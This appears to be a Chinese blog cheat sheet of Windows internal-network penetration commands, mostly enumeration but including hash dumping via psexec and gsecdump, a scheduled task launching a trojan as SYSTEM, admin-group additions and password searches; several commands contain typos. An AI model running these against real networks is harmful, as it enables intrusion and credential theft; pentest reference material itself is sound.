天天看點

揭秘内網滲透:指令大全助你輕松測試安全【内網滲透指令大全】

作者:Linux運維大學營

網絡安全最新課程大綱

感興趣可留言

揭秘内網滲透:指令大全助你輕松測試安全【内網滲透指令大全】

1.域常用操作指令:

net group /domain

//獲得所有域使用者組清單

net group qq_group /domain

//顯示域中qq_group組的成員

net group qq_group /del /domain

//删除域中qq_group組

net group qq_group qq /del /domain

//删除域内qq_group 群組中的成員QQ

net group qq_group /add /domain

//增加域中的群組

net group "domain admins" /domain

//獲得域管理者清單

net group "enterprise admins" /domain

//獲得企業管理者清單

net localgroup administrators /domain

//擷取域内置administrators組用(enterprise admins、domain admins)

net group "domain controllers" /domain

//獲得域控制器清單

net group "domain computers" /domain

//獲得所有域成員計算機清單

net user /domain

//獲得所有域使用者清單

net user someuser /domain

//獲得指定賬戶someuser的詳細資訊

net accounts /domain

//獲得域密碼政策設定,密碼長短,錯誤鎖定等資訊

nei view /domain

//查詢有幾個域, 查詢域清單

net view /domain:testdomain

//檢視 testdomain域中的計算機清單

nltest /domain_trusts

//擷取域信任資訊

net user domain-admin /domain

//檢視管理者登陸時間,密碼過期時間,是否有登陸腳本,組配置設定等資訊

net config Workstation

//查詢機器屬于哪個域

net time /domian

//查詢主域伺服器的時間

echo %logonserver%

//檢視登陸到這台伺服器的計算機名

net time \\192.168.1.1

//查詢遠端共享主機192.168.1.1的時間

net use \\IP\ipc$ password /user:username@domain

//ipc$域内連接配接

net view \\dc2.backlion.com

//檢視域控共享情況

dir \\dc2.backlion.com\SYSVOL /s /a > sysvol.txt

//列出sysvol日志記錄

xcopy \\dc2.backlion.com\sysvol.txt sysvol.txt /i /e /c

//遠端拷貝到本地sysvol日志

net user /domain bk bk123

//修改域内使用者密碼,需要管理者權限

net localgroup administartors SEZKL\backlion /add

//将SEZKL域中的使用者backlion添加到administrators組中

mstsc /admin

//遠端桌面登入到console會話解決hash無法抓出問題

gpupdate/force

//更新域政策

psexec \\192.168.1.3 -u administrator -p bk1234 -c gsecdump.exe -u

//從域伺服器密碼存儲檔案windows/ntds/ntds.dit導出hash值出來

gsecdump -a

//擷取域登管理者登入過得hash值,這裡gescdump為第三方導出AD域的hash值

tasklist /S ip /U domain\username /P /V

//檢視遠端計算機程序列

揭秘内網滲透:指令大全助你輕松測試安全【内網滲透指令大全】

2.基本内網滲透指令:

ipconfig/all

//檢視IP位址

ipconfig /release

//釋放位址

ipconfig /renew

重新擷取Ip位址

whoami

//查詢賬号所屬權限

whoami/all

//檢視sid值

systeminfo

//查詢系統以及更新檔資訊

tasklist /svc

//檢視程序

taskkill /im 程序名稱(cmd)

//結束程序

taskkill /pid[程序碼] -t(結束該程序) -f(強制結束該程序以及所有子程序)

wmic qfe get hotfixid

//檢視已安裝過得更新檔,這個很實用

wmic qfe list full /format:htable > hotfixes.htm

//詳細的更新檔安裝

wmic qfe

//查詢更新檔資訊以及微軟提供的下載下傳位址

ping hostname(主機名)

//顯示該機器名的IP

net start

//檢視目前運作的服務

net user

//檢視本地組的使用者

net localhroup administrators

//檢視本機管理者組有哪些使用者

net user

//檢視會話

net session

//檢視目前會話

net share

//檢視SMB指向的路徑[即共享]

wmic share get name,path

//檢視SMB指向的路徑

wmic nteventlog get path,filename,writeable

//查詢系統日志檔案存儲位置

net use \\IP\ipc$ password /user:username

//建立IPC會話(工作組模式)

net use z: \\192.168.1.1

//建立映射到本機Z盤

net time \\172.16.16.2

//查詢共享主機的是

at \\172.16.16.2 13:50 c:\windows\2009.exe

//在共享主機上執行

netstat -ano

//檢視開放的端口

netstat -an | find “3389”

//找到3389端口

net accounts

//檢視本地密碼政策

nbtstat –A ip

//netbiso查詢

net view

//檢視機器注釋或許能得到目前活動狀态的機器清單,如果禁用netbios就檢視不出來

echo %PROCESSOR_ARCHITECTURE%

//檢視系統是32還是64位

set

//檢視系統環境設定變量

net start

//檢視目前運作的服務

wmic service list brief

//檢視程序服務

wmic process list brief

//檢視程序

wmic startup list brief

//檢視啟動程式資訊

wmic product list brief

//檢視安裝程式和版本資訊(漏洞利用線索)

wmic startup list full

//識别開機啟動的程式

qwinsta

//檢視登入情況

schtasks.exe /Create /RU"SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "c:/muma.ex e" /ED 2017/4/7

//添加計劃任務

REG query HKCU /v "pwd" /s

//擷取儲存到系統資料庫中的密碼

3.内網網絡結常用指令:

tracert IP

//路由跟蹤

route print

//列印路由表

arp -a

//列出本網段内所有活躍的IP位址

arp -s (ip + mac)

//綁定mac與ip位址

arp -d (ip + mac)

//解綁mac與ip位址

nbtscan -r 192.168.16.0/24

//通過小工具nbtscan掃描整個網絡

netsh firewall show config

//檢視防火牆政策

netsh firewall show state

//檢視防火牆政策

for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i"ttl"

//批量掃描内網存活主機

windows自帶端口轉發:

netsh——interface——ipv6 install

//首先安裝IPV6(xp、2003下IPV6必須安裝,否則端口轉發不可用!)

netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=22connectaddress=1.1.1.1 connectport=22

//将本機22到1.1.1.1的22

netsh interface portproxy add v4tov4 listenaddress=192.168.193.1listenport=22 connectaddress=8.8.8.8 connectport=22

netsh interface portproxy add v4tov4 listenaddress=192.168.193.1listenport=22 connectaddress=www.baidu.com connectport=22

netsh interface portproxy show all

// 檢視轉發配置

netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0listenport=22

//删除配置

netsh firewall set portopening protocol=tcp port=22 name=Forwardmode=enable scope=all profile=all

//添加防火牆規則,允許連接配接22:

4.敏感資料和目錄:

dir /b/s config.*

//檢視所在目錄所有config.為字首的檔案

findstr /si password *.xml *.ini *.txt

//檢視字尾名檔案中含有password關鍵字的檔案

findstr /si login *.xml *.ini *.txt

//檢視字尾名檔案中含有login關鍵字的檔案

copy con 建立指令:

copy con ftp.bat

//建立ftp.bat批處理,然後輸入ifconfig等指令,按ctr+z退出,并建立成功

copy con test.vbs

//建立test.vbs腳本,輸入腳本後,按ctr+z退出,并建立成功

5.dsquery的AD查詢工具:

dsquery user domainroot -limit 65535 && net user /domain

//列出該域内所有使用者名

dsquery server -domain super.com | dsget server -dnsname -site

//搜尋域内所有域控制器并顯示他們的DNS主機名和站點名稱

dsquery contact

//尋找目錄中的聯系人

dsquery subnet

//列出該域内網段劃分

query user

//查詢那些使用者線上

dsquery group && net group /domain

//列出該域内分組

dsquery ou

//列出該域内組織機關

dsquery server && net time /domain

//列出該域内域控制器

dsquery site -o rdn

//搜尋域中所有站點的名稱

dsquery group dc=super,dc=com |more

//搜尋在DC=SUPER,DC=COM 域中的所有組

psloggedon.exe

//查詢那台主機和使用者登入到該主機上

netsess.exe //192.168.1.115

//遠端主機上無需管理者權限,查詢到主機名和使用者

reg query "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\TERMINAL SERVERCLIENT\DEFAULT"

//擷取最近mstsc登入的記錄

6.DOS常用快捷指令

mspaint 畫圖工具

calc 電腦

notepad 記事本

taskmgr 任務管理器

osk 打開螢幕鍵盤

gpedit.msc 組政策

services.msc 本地服務

compmgmt.msc 計算機管理

devmgmt.msc 裝置管理器

winver 檢視系統版本

magnify 放大鏡實用程式

eventvwr 事件檢視器

Regedit 打開系統資料庫

resmon 資源螢幕

WMIC BIOS get releasedate 檢視電腦生産日期

mstsc -f 遠端連接配接(可以全屏)

繼續閱讀